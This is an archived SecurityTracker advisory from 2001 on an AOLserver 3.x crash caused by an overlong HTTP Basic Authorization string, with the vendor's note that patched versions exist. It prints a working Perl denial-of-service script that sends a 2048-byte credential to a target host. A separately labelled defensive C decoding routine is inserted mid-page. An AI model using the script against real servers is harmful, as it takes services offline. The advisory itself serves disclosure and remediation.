SecurityTracker.com

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   AOLserver
Vendors:   America Online, Inc.
(Patch Information) Re: AOLserver Can Be Crashed By Remote Users With a Long HTTP Authentication String And May Execute Arbitrary Code
SecurityTracker Alert ID:  1002337
SecurityTracker URL:  http://securitytracker.com/id/1002337
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Sep 7 2001
Impact:   Denial of service via network
Fix Available:  Yes
Vendor Confirmed:  Yes
Version(s): 3.0, 3.2
Description:   It is reported that previous versions of AOLserver can be crashed by remote users and may execute arbitrary code [the code execution ability has not been verified] due to improper handling of long authentication data.

In response to a Basic HTTP Authentication request, a remote user can send a long authentication string to cause the server to crash.

A demonstration exploit script is provided:

#!/usr/bin/perl
use IO::Socket;
unless (@ARGV == 1) { die "usage: $0 host ..." }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $host,
PeerPort => "http(80)",
);
unless ($remote) { die "cannot connect to http daemon on $host" }

$junk = "X" x 2048;
$killme = "GET / HTTP/1.0\nAuthorization: Basic ".$junk."\r\n\r\n";
$remote->autoflush(1);
print $remote $killme;
close $remote;

Impact:   A remote user can cause the server to crash. It has not been confirmed whether this flaw will allow a remote user to cause arbitrary code to be executed.
Solution:   The vendor notes that the AOLserver 3.2 release and earlier are not supported. However, a patch for 3.2 will reportedly be posted to the web site.

The supported versions of AOLserver, versions 3.3.1 and 3.4, are reportedly not vulnerable.

Vendor URL:  www.aolserver.com/
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)
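
A bounds-checked way to handle the Authorization value described above, as an added example (not AOLserver's code and not the vendor's patch): the input length is capped and the output size is checked before any byte is written. The function name, the 344-character cap and the case-sensitive "Basic " match are assumptions made for illustration.

```c
#include <stddef.h>
#include <string.h>

#define MAX_B64_CRED 344  /* assumed policy cap on the base64 text (258 decoded bytes) */

/* Map one base64 character to its 6-bit value, or -1 if outside the alphabet. */
static int b64_val(unsigned char c) {
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

/* Decode the value of an "Authorization:" header using the Basic scheme into out.
 * Returns the decoded length (out is NUL-terminated), or -1 if the value is
 * malformed, longer than the cap, or too large for out_cap bytes. */
long basic_auth_decode(const char *value, char *out, size_t out_cap) {
    size_t n, i, o = 0, pad = 0;

    if (value == NULL || out == NULL || out_cap == 0) return -1;
    if (strncmp(value, "Basic ", 6) != 0) return -1;
    value += 6;

    /* Measure the credential text, but never scan past the cap. */
    for (n = 0; n <= MAX_B64_CRED && value[n] != '\0'; n++) { }
    if (n == 0 || n > MAX_B64_CRED || n % 4 != 0) return -1;
    if (value[n - 1] == '=') pad = (value[n - 2] == '=') ? 2 : 1;
    /* Size check happens before the first byte is written. */
    if ((n / 4) * 3 - pad + 1 > out_cap) return -1;

    for (i = 0; i < n; i += 4) {
        unsigned long w = 0;
        size_t k;
        for (k = 0; k < 4; k++) {
            unsigned char c = (unsigned char)value[i + k];
            int v = (c == '=' && i + k >= n - pad) ? 0 : b64_val(c);
            if (v < 0) return -1;  /* stray '=' or non-base64 byte */
            w = (w << 6) | (unsigned long)v;
        }
        out[o++] = (char)((w >> 16) & 0xFF);
        if (i + 4 < n || pad < 2) out[o++] = (char)((w >> 8) & 0xFF);
        if (i + 4 < n || pad < 1) out[o++] = (char)(w & 0xFF);
    }
    out[o] = '\0';
    return (long)o;
}
```

A caller should treat -1 as a failed authentication and discard the contents of out.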

Message History:   This archive entry is a follow-up to the message listed below.
Aug 27 2001 AOLserver Can Be Crashed By Remote Users With a Long HTTP Authentication String And May Execute Arbitrary Code



 Source Message Contents

Subject:  Re: AOLserver 3.0 vulnerability


Hello,

This issue is endemic to the unsupported AOLserver 3.2 release and
earlier. I wrote a patch for 3.2 that addresses this problem which I will
be putting on aolserver.com.

The supported versions of AOLserver, versions 3.3.1 and 3.4, do not have
this bug.

Kris






 
 



Copyright 2021, SecurityGlobal.net LLC